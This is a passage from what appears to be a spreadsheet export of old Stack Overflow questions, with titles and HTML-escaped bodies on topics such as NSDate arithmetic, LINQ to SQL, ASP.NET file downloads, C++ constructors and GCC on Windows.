&lt;pre&gt;&lt;code&gt;[NSDate dateWithTimeIntervalSinceNow:(3600*24*7*(weeks))]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know how many months have passed since the event was repeated but I can't figure out how to make an NSDate object that represents 1 month/3 months/6 months/9 months into the future. Ideally I want the user to say repeat monthly starting Oct. 14 and it will repeat the 14th of every month.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's is a good ratio of Class to Lines of Code for Object-Oriented languages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's is a good ratio for the number Classes to Lines of Code for an Object-Oriented language (say C++,C#,Java and their likes)?&lt;/p&gt;
&lt;p&gt;Many people, including managers, like the traditional LOC (lines of code) metric to measure the complexity of software, while many hard-boiled Object Oriented developers will say LOC is worthless its Class count that matters. And personally I believe that Classes may be a more reasonable metric of complexity, but that without a LOC metric the actual complexity of those classes (amount of poltergeists and gods in there) is hard to estimate.&lt;/p&gt;
&lt;p&gt;Thus does anybody know of what is likely to be a healthy ratio for some fairly well coded software?&lt;/p&gt;
&lt;p&gt;Edit: In this particular case, I'm looking for a ratio to determine a ball-park estimate of how much refactoring might be required to clean up the code.&lt;/p&gt;
&lt;p&gt;Edit: Does anyone know of ratios for some big OSS projects like Firefox, Apache, Webkit, etc...?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add to a list with Linq to SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table in the database that I'm retrieving using LINQ to SQL, and as a part of my processing I want to add to this list, then update the database with the new items + any changes I've made.&lt;/p&gt;
&lt;p&gt;What I thought I could do was this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var list = (from item in db.Table
            select item).ToList();
[do processing where I modify items &amp;amp; add to the list]
list = list.Distinct();
db.SubmitChanges();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What happens is that the modifications happed (ie. SQL updates) but any new items I add to the list don't get added.&lt;/p&gt;
&lt;p&gt;Obviously I'm doing this wrong, what is the correct way to modify &amp;amp; add to a list of DB entities, then commit all the updates &amp;amp; inserts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL 2005 Full-Text Catalog is randomly sloooowww</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've built a full-text catalog on a SQL 2005 box that, after it's re-build process completes, runs extremely slow.  I've implemented a hack (i.e. try...catch{do again}) so that my users don't get a timeout error; this makes me feel bad inside.  All subsequent queries are lightning fast.&lt;/p&gt;
&lt;p&gt;Has anyone experienced this issue and was/is there a solution?  Thanks!&lt;/p&gt;
&lt;p&gt;P.S. Yes, I've Google'd it many times.  Even with my left hand.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>onClose Event in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an event like onLoad? &lt;/p&gt;
&lt;p&gt;just at closing the Site (onClose)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP's file_get_contents not returning until remote servers' keep-alive limit is exceeded</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From one apache server file_get_contents returns the contents of a url straight away.  On another apache server file_get contents won't return the contents of the same url until the keep-alive limit of the server hosting that url has been expired.  The 2 php servers are retrieving the same url but through different network routes.  What could be causing one php installation to wait for the remote keep-alive limit before returning?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get Visual Studio to throw exceptions across threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my Silverlight project I have a thread that fires every x milliseconds. In this thread I was attempting to change the state of the application. This wasn't working and I didn't know why, so put a breakpoint in to the Timer callback. The breakpoint was hit, but the minute I attempted to change the state it just bailed out of the function (assuming an exception has been thrown).&lt;/p&gt;
&lt;p&gt;I know &lt;em&gt;why&lt;/em&gt; the error occurred - you can't change GUI stuff via a non-GUI thread.&lt;/p&gt;
&lt;p&gt;My question is - how can I get Visual Studio to actually break when an exception like that occurs? (Rather than just silently bailing out, which doesn't notify me if there is a problem).&lt;/p&gt;
&lt;p&gt;I've tried the "Break when exceptions cross AppDomain or managed / native boundaries", but that didn't have any effect.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create COM component and ActiveX controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is is possible to create COM component and ActiveX controls in .Net (using c# language). I searched internet but i could`t get anything.&lt;br&gt;&lt;br&gt;
Thanks,&lt;br&gt;
santhosh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to specify proxy credentials in your web.config?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to configure a website to access a webservice on another machine, via a proxy.  I can configure the website to use a proxy, but I can't find a way of specifying the credentials that the proxy requires, is that possible?  Here is my current configuration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;defaultProxy useDefaultCredentials="false"&amp;gt;
    &amp;lt;proxy usesystemdefault="true" proxyaddress="&amp;lt;proxy address&amp;gt;" bypassonlocal="true" /&amp;gt;
&amp;lt;/defaultProxy&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know you can do this via code, but the software the website is running is a closed-source CMS so I can't do this.&lt;/p&gt;
&lt;p&gt;Is there any way to do this?  MSDN isn't helping me much..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interesting UTF-8 Yahoo File Download Headers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company runs a webmail service, and we were trying to diagnose a problem with Word downloads not opening automatically - the same *.doc file download from Yahoo Mail would open, but one from ours would not.&lt;/p&gt;
&lt;p&gt;In the course of investigating the headers we saw this coming from Yahoo:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;content-disposition attachment; filename*="utf-8''word document.doc";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whereas our headers were like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;content-disposition attachment; filename="word document.doc";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What exactly is Yahoo doing with the additional asterisk and utf-8'' designation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool for web server redirect management?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm considering rolling my own, but just in case there's a good piece of software already available, I'm asking here: Is there something that will provide an interface to webserver redirect configuration, and allow redirects to be managed by a fairly non-technical userbase. The following requirements must be fulfilled:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Open-source&lt;/li&gt;
&lt;li&gt;Apache&lt;/li&gt;
&lt;li&gt;Support for internal / external redirects&lt;/li&gt;
&lt;li&gt;Support for both web-server config and htaccess or meta-refresh files (for users who cannot restart the server)&lt;/li&gt;
&lt;li&gt;Date range for validity&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What ReSharper 4+ live templates for C# do you use?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What ReSharper 4.0 templates for &lt;strong&gt;C#&lt;/strong&gt; do you use?&lt;/p&gt;
&lt;p&gt;Let's share these in the following format:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;[Title]&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Optional description&lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Shortcut:&lt;/strong&gt; shortcut&lt;br /&gt;
&lt;strong&gt;Available in:&lt;/strong&gt; [AvailabilitySetting]&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Resharper template code snippet
// comes here
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Macros properties&lt;/strong&gt; (if present):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Macro1&lt;/strong&gt; - Value - EditableOccurence&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Macro2&lt;/strong&gt; - Value - EditableOccurence&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One macro per answer, please!&lt;/li&gt;
&lt;li&gt;Here are some samples for &lt;a href="http://stackoverflow.com/questions/186970/what-resharper-40-templates-for-c-do-you-use#186978"&gt;NUnit test fixture&lt;/a&gt; and &lt;a href="http://stackoverflow.com/questions/186970/what-resharper-40-templates-for-c-do-you-use#186978"&gt;Standalone NUnit test case&lt;/a&gt; that describe live templates in the suggested format.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Large File Download - Connection With Server Reset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an asp.net website that allows the user to download largish files - 30mb to about 60mb.  Sometimes the download works fine but often it fails at some varying point before the download finishes with the message saying that the connection with the server was reset.&lt;/p&gt;
&lt;p&gt;Originally I was simply using Server.TransmitFile but after reading up a bit I am now using the code posted below.  I am also setting the Server.ScriptTimeout value to 3600 in the Page_Init event.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void DownloadFile(string fname, bool forceDownload)
        {
            string path = MapPath(fname);
            string name = Path.GetFileName(path);
            string ext = Path.GetExtension(path);
            string type = "";
            // set known types based on file extension  
            if (ext != null)
            {
                switch (ext.ToLower())
                {
                    case ".mp3":
                        type = "audio/mpeg";
                        break;
                    case ".htm":
                    case ".html":
                        type = "text/HTML";
                        break;
                    case ".txt":
                        type = "text/plain";
                        break;
                    case ".doc":
                    case ".rtf":
                        type = "Application/msword";
                        break;
                }
            }
            if (forceDownload)
            {
                Response.AppendHeader("content-disposition",
                    "attachment; filename=" + name.Replace(" ", "_"));
            }
            if (type != "")
            {
                Response.ContentType = type;
            }
            else
            {
                Response.ContentType = "application/x-msdownload";
            }
            System.IO.Stream iStream = null;
            // Buffer to read 10K bytes in chunk:
            byte[] buffer = new Byte[10000];
            // Length of the file:
            int length;
            // Total bytes to read:
            long dataToRead;
            try
            {
                // Open the file.
                iStream = new System.IO.FileStream(path, System.IO.FileMode.Open,
                            System.IO.FileAccess.Read, System.IO.FileShare.Read);
                // Total bytes to read:
                dataToRead = iStream.Length;
                //Response.ContentType = "application/octet-stream";
                //Response.AddHeader("Content-Disposition", "attachment; filename=" + filename);
                // Read the bytes.
                while (dataToRead &amp;gt; 0)
                {
                    // Verify that the client is connected.
                    if (Response.IsClientConnected)
                    {
                        // Read the data in buffer.
                        length = iStream.Read(buffer, 0, 10000);
                        // Write the data to the current output stream.
                        Response.OutputStream.Write(buffer, 0, length);
                        // Flush the data to the HTML output.
                        Response.Flush();
                        buffer = new Byte[10000];
                        dataToRead = dataToRead - length;
                    }
                    else
                    {
                        //prevent infinite loop if user disconnects
                        dataToRead = -1;
                    }
                }
            }
            catch (Exception ex)
            {
                // Trap the error, if any.
                Response.Write("Error : " + ex.Message);
            }
            finally
            {
                if (iStream != null)
                {
                    //Close the file.
                    iStream.Close();
                }
                Response.Close();
            }
        }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I return an exit code from a VBScript console application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I Have an old vbs script file being kicked off by an AutoSys job. Can I, and how do I, return an int return value to indicate success or failure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implement validation as a method or as a property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an object that needs a test if the object data is valid. The validation itself would be called from the thread that instatiated the object, it looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; {
  if (_step.Equals(string.Empty)) return false;
  if (_type.Equals(string.Empty)) return false;
  if (_setup.Equals(string.Empty)) return false;
  return true;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would it be better to implement this as a property, or as a method, and why? I have read the answers to a &lt;a href="http://stackoverflow.com/questions/164023/what-guidelines-are-appropriate-for-determining-when-to-implement-a-class-membe"&gt;related question&lt;/a&gt;, but I don't think this specific question is covered there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Missing Workflow project templates in Visual Studio 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot add workflow item to my WPF project.&lt;/p&gt;
&lt;p&gt;I create a new WPF project and want to add a sequential workflow. When I do "Add new item" there is no item template to select.&lt;/p&gt;
&lt;p&gt;Any hints?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Agile/Scrum resource planning cross projects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have different steps in our planning for online webprojects:&lt;/p&gt;
&lt;p&gt;1) Information Architecture&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provides user stories&lt;/li&gt;
&lt;li&gt;Provides wireframes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;2) Design&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use Wireframes to develop a nice design&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;3) Development&lt;/p&gt;
&lt;p&gt;4) Testing&lt;/p&gt;
&lt;p&gt;I know that working agile asks for dedicated teams. But it is impossible to have a dedicted IA until the end of the project. Because the projects are small developers are working in different teams. How do you plan resources when you know 50 small projects and 20 new projects are using different resources?&lt;/p&gt;
&lt;p&gt;And is there a useful tool that can assist in this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why use Ruby instead of Smalltalk?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ruby is becoming &lt;a href="http://www.tiobe.com/index.php/content/paperinfo/tpci/index.html" rel="nofollow"&gt;popular&lt;/a&gt;, largely from the influence Ruby on Rails, but it feels like it is currently struggling through its adolescence. There are a lot of similarities between Ruby and Smalltalk -- &lt;a href="http://ruby.gemstone.com/" rel="nofollow"&gt;maglev&lt;/a&gt; is a testament to that. Despite having a more unusual syntax, Smalltalk has all (if not more) of the object-oriented beauty of Ruby. &lt;/p&gt;
&lt;p&gt;From what I have read, Smalltalk seems to have Ruby beat on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Maturity (developed in the 1970's)&lt;/li&gt;
&lt;li&gt;Stability&lt;/li&gt;
&lt;li&gt;Commercial support&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiresong.ca/monticello/" rel="nofollow"&gt;Distributed source control&lt;/a&gt; (understands structure of code, not just text diffing)&lt;/li&gt;
&lt;li&gt;Several &lt;a href="http://en.wikipedia.org/wiki/Smalltalk#List_of_implementations" rel="nofollow"&gt;implementations of the VM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Cross-platform support&lt;/li&gt;
&lt;li&gt;The &lt;a href="http://www.seaside.st/" rel="nofollow"&gt;seaside web framework&lt;/a&gt; as a &lt;a href="http://www.sauria.com/blog/2005/11/10" rel="nofollow"&gt;strong alternative to Rails&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It seems like Ruby is just reinventing the wheel. So, why don't Ruby developers use SmallTalk? &lt;strong&gt;What does Ruby have the Smalltalk doesn't?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;em&gt;For the record: I'm a Ruby guy with little to no experience in Smalltalk, but I'm starting to wonder why.&lt;/em&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I think the ease-of-scripting issue has been addressed by &lt;a href="http://en.wikipedia.org/wiki/GNU_Smalltalk" rel="nofollow"&gt;GNU Smalltalk&lt;/a&gt;. As I understand it, this allows you to write smalltalk in regular old text files, and you no longer need to be in the Smalltalk IDE. You can then &lt;a href="http://www.gnu.org/software/smalltalk/manual/html_node/Invocation.html#Invocation" rel="nofollow"&gt;run your scripts&lt;/a&gt; with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gst smalltalk_file
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Preprocessing source code as a part of a maven build</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a lot of Java source code that requires custom pre-processing. I'd like rid of it but that's not feasible right now so I'm stuck with it. Given that I have an unfortunate problem that shouldn't have existed in the first place, how do I solve it using maven? &lt;/p&gt;
&lt;p&gt;(For the full story, I'm replacing a python-based build system with a maven one, so one improvement at a time please. Fixing the non-standard source code is harder, and will come later.)&lt;/p&gt;
&lt;p&gt;Is it possible using any existing Maven plugins to actually alter the source files during compile time? (Obviously leaving the original, unprocessed code alone)&lt;/p&gt;
&lt;p&gt;To be clear, by preprocessing I mean preprocessing in the same sense as antenna or a C compiler would preprocess the code, and by custom I mean that it's completely proprietary and looks nothing at all like C or antenna preprocessing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to migrate a 3rd party web part from SharePoint 2 (2003) to SharePoint 3 (2007)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am migrating a site from SharePoint 2 to 3 (in fact, from SharePoint Portal Server 2003 to Microsoft Office SharePoint Server 2007).  There are a handful of 3rd party web parts and since this is a migration, not an in-place upgrade, I need to install these web parts on the new farm.&lt;/p&gt;
&lt;p&gt;How do I do this, given that I have the packaged up web parts as provided by the SharePoint Configuration Analyzer in the form of cab files?  Can I simply deploy these cab files somehow, even though they are not packaged as solutions?  Or do I need to pull the cab files apart and repackage them as solutions?  Or do I need to get new versions of the web parts, written for SharePoint 3, and maybe edit the pages that use them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can a WinForms app be configured to run as "x86" without recompiling?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can a WinForms app compiled for "Any CPU" be configured to run as "x86" on a 64-bit server without recompiling the app? Specifically, I'm looking for an app.config setting or Control Panel applet to accomplish this end. All the customer's clients are x86, but the server is x64, and we like to install the WinForms app on the server for administrators to configure and monitor the system. We would much rather not recompile just for the server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Default parameters with C++ constructors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it good practice to have a class constructor that uses default parameters, or should I use separate overloaded constructors?  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Use this...
class foo  
{
private:
    std::string name_;
    unsigned int age_;
public:
    foo(const std::string&amp;amp; name = "", const unsigned int age = 0) :
        name_(name),
        age_(age)
    {
        ...
    }
};
// Or this?
class foo  
{
private:
    std::string name_;
    unsigned int age_;
public:
    foo() :
    name_(""),
    age_(0)
{
}
foo(const std::string&amp;amp; name, const unsigned int age) :
        name_(name),
        age_(age)
    {
        ...
    }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Either version seems to work, e.g.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foo f1;
foo f2("Name", 30);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which style do you prefer or recommend and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Copy tables from one database to another in SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database called foo and a database called bar. I have a table in foo called tblFoobar that I want to move (data and all) to database bar from database foo. What is the SQL statement to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Relocate JSF-generated javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using lots of commandLinks in my app. For them to work, JSF generates some wild Javascript ( &lt;code&gt;function dpf(f) {var adp...&lt;/code&gt; ). Sadly, the script-tag destroys my layout. (It really does - I am sure about that).&lt;/p&gt;
&lt;p&gt;Is there a way to force JSF to generate the script-tag somewhere else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding click event to button to fire javascript, through VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASP.NET page which pulls a set of images from a database table, and using an enumerator, goes through all of them and displays then.&lt;/p&gt;
&lt;p&gt;This all happens in the codebehind (VB.NET), where the code adds the placeholder and some controls inside tables (tables inside the placeholder).&lt;/p&gt;
&lt;p&gt;I've added a button to this placeholder (inside a table cell), all programatically, but how can I add a click event to the button programatically? I want to fire a javascript (lightbox) which shows a large preview of the image (this works when the user clicks a small image, which invokes a string hyperlink on the code that points to the javascript).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DBCC CHECKIDENT on a temporary table throwing permissions error for wrong user</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm logged into a SQL Server 2005 database as a non-sa user, 'bhk', that is a member of the 'public' server role only. The following code tries to execute within a stored procedure called by user 'bhk'. This line of code...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TRUNCATE TABLE #Table1
DBCC CHECKIDENT('#Table1', RESEED, @SequenceNumber) WITH NO_INFOMSGS
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;causes this error...&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;User 'guest' does not have permission
  to run DBCC CHECKIDENT for object&lt;br /&gt;
  '#Table1__00000000007F'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm aware of the permissions required to run DBCC CHECKIDENT...&lt;br /&gt;
&lt;strong&gt;*Caller must own the table&lt;/strong&gt;, or be a member of the sysadmin fixed server role, the db_owner fixed database role, or the db_ddladmin fixed database role.*&lt;/p&gt;
&lt;p&gt;So I have two questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Since 'bhk' is calling a stored
procedure that creates a temporary
table, shouldn't 'bhk' be the owner
and be allowed to run DBCC
CHECKIDENT?&lt;/li&gt;
&lt;li&gt;Why does the error
    message return that user 'guest'
    doesn't have permission?  To my knowledge, I'm not
    logged in as 'guest'.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does GCC-Windows depend on cygwin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not a C++ developer, but I've always been interested in compilers, and I'm interested in tinkering with some of the GCC stuff (particularly LLVM).&lt;/p&gt;
&lt;p&gt;On Windows, GCC requires a POSIX-emulation layer (cygwin or MinGW) to run correctly.&lt;/p&gt;
&lt;p&gt;Why is that?&lt;/p&gt;
&lt;p&gt;I use lots of other software, written in C++ and cross-compiled for different platforms (Subversion, Firefox, Apache, MySQL), and none of them require cygwin or MinGW.&lt;/p&gt;
&lt;p&gt;My understanding about C++ best-practice programming is that you can write reasonably platform-neutral code and deal with all the differences during the compilation process.&lt;/p&gt;
&lt;p&gt;So what's the deal with GCC? Why can't it run natively on Windows?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Okay, the two replies so far say, basically, "GCC uses the posix layer because it uses the posix headers".&lt;/p&gt;
&lt;p&gt;But that doesn't really answer the question.&lt;/p&gt;
&lt;p&gt;Let's say I already have a set of headers for my favorite standard library. Why would I still need the posix headers?&lt;/p&gt;
&lt;p&gt;Does GCC require cygwin/mingw to actually &lt;em&gt;RUN&lt;/em&gt;?&lt;/p&gt;
&lt;p&gt;Or does it only need the emulation layer for headers and libraries? If so, why can't I just give it a "lib" directory with the required resources?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT AGAIN:&lt;/p&gt;
&lt;p&gt;Okay, I'll try again to clarify the question...&lt;/p&gt;
&lt;p&gt;I also write code in &lt;a href="http://digitalmars.com/d"&gt;the D Programming Language&lt;/a&gt;. The official compiler is named "dmd" and there are official compiler binaries for both Windows and linux.&lt;/p&gt;
&lt;p&gt;The Windows version doesn't require any kind of POSIX emulation. And the Linux version doesn't require any kind of Win32 emulation. If the compiler has assumptions about its environment, it hides those assumptions pretty well.&lt;/p&gt;
&lt;p&gt;Of course, I have to tell the compiler where to find the standard library and where to find libraries to statically or dynamically link against.&lt;/p&gt;
&lt;p&gt;GCC, by contrast, insists on pretending it's operating within a posix environment, and it asks ME to humor those assumptions by setting up an emulation layer.&lt;/p&gt;
&lt;p&gt;But what, exactly, within GCC relies on that layer? Is it just looking for stdlib headers, and it assumes it'll find those headers within "/usr/lib"?&lt;/p&gt;
&lt;p&gt;If that's the case, shouldn't I just be able to tell it to look in "C:/gcc/lib" to find those header files?&lt;/p&gt;
&lt;p&gt;Or does GCC itself rely on the POSIX libraries to access the file system (and to do other low-level stuff)? If that's the case, then I wonder why they don't just statically link with their favorite windows POSIX libraries. Why require the user to set up the dependencies, when they could build those dependencies right into the application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mathematics and Game Programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to program graphical 2D games more complex than the basic 2D stuff I already know. I don't want to do 3D programming. Just more complex 2D stuff. I dropped high school before I could learn a lot of stuff so I walked away with enough algebra knowledge to balance my checkbook and do some light 2D Cartesian programming.&lt;/p&gt;
&lt;p&gt;Are there any good resources out there for a guy with a limited attention span (say 20 minutes apiece for a subject I'm keenly interested in) to learn, gradually, how to do something more useful with math in programming?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I specify my explicit type comparator inline?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So .NET 3.0/3.5 provides us with lots of new ways to query, sort, and manipulate data, thanks to all the neat functions supplied with LINQ.  Sometimes, I need to compare user-defined types that don't have a built-in comparison operator.  In many cases, the comparison is really simple -- something like foo1.key ?= foo2.key.  Rather than creating a new IEqualityComparer for the type, can I simply specify the comparison inline using anonymous delegates/lambda functions?  Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var f1 = ...,
    f2 = ...;
var f3 = f1.Except(
           f2, new IEqualityComparer(
             (Foo a, Foo b) =&gt; a.key.CompareTo(b.key)
           ) );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm pretty sure the above doesn't actually work.  I just don't want to have to make something as "heavy" as a whole class just to tell the program how to compare apples to apples.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do You Handle Validation In Silverlight?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How have you decided to handle data/control validation in your silverlight applications?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best version control system for handling projects with graphics?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm part of a small team (usually just two people), I handle the code, he handles the graphic design.  In the past I've used CVS to handle version control of the code files, and while we've included the graphics in the repository, he hasn't derived nearly as much value from it as I have.  &lt;/p&gt;
&lt;p&gt;Are there other packages that provide the better features for supporting graphics?  The system would need to have an easy to use GUI interface, as I don't think it's fair to expect a graphic designer to learn command-line tools.&lt;/p&gt;
&lt;p&gt;Additional aspect: The client software needs to run smoothly on OS X (for the designer), and Windows (for the programmer).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you execute a stored procedure using Castle ActiveRecord?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I believe there is a discussion on this very topic somewhere on the net but I lost the url and I am unable to find it via googling.&lt;/p&gt;
&lt;p&gt;What I might try right now would be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ISessionFactoryHolder factoryHolder = ActiveRecordMediator&amp;lt;EntityClass&amp;gt;.GetSessionFactoryHolder();
ISession session = factoryHolder.CreateSession(typeof(EntityClass));
try
{
    IDbCommand cmd = session.Connection.CreateCommand();
    cmd.CommandText = "spName";
    cmd.ExecuteNonQuery();
}
catch(Exception ex)
{
}
finally
{
    factoryHolder.ReleaseSession(session);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I am not quite sure if this is the correct way to do this or if perhaps a better way exists.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Expose Java class as SOAP WebService - how?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a framework to turn given Java class into WebService (may be with some limitations on method parameters etc)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add an extra source directory that will be used by the maven-jxr-plugin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the build-helper-maven-plugin to add it to my build, but I'd
like to see the XREF source for this extra source directory as well.&lt;/p&gt;
&lt;p&gt;FYI:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://maven.apache.org/plugins/maven-jxr-plugin/index.html" rel="nofollow"&gt;maven-jxr-plugin&lt;/a&gt; - The JXR plugin produces a cross-reference of the project's sources. The generated reports make it easier for the user to reference or find specific lines of code. It is also handy when used with the PMD plugin for referencing errors found in the code.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://mojo.codehaus.org/build-helper-maven-plugin/index.html" rel="nofollow"&gt;build-helper-maven-plugin&lt;/a&gt; - This plugin contains various small independent goals to assist with Maven build lifecycle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to format a string as a telephone number in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a string "1112224444' it is a telephone number. I want to format as 111-222-4444 before I store it in a file. It is on a datarecord and I would prefer to be able to do this without assigning a new variable.&lt;/p&gt;
&lt;p&gt;I was thinking:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String.Format("{0:###-###-####}", i["MyPhone"].ToString() );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that does not seem to do the trick.&lt;/p&gt;
&lt;p&gt;** UPDATE **&lt;/p&gt;
&lt;p&gt;Ok. I went with this solution&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Convert.ToInt64(i["Customer Phone"]).ToString("###-###-#### ####")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now its gets messed up when the extension is less than 4 digits. It will fill in the numbers from the right. so&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1112224444 333  becomes
11-221-244 3334
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommendations for converting raster images to vector graphics</t>
  </si>
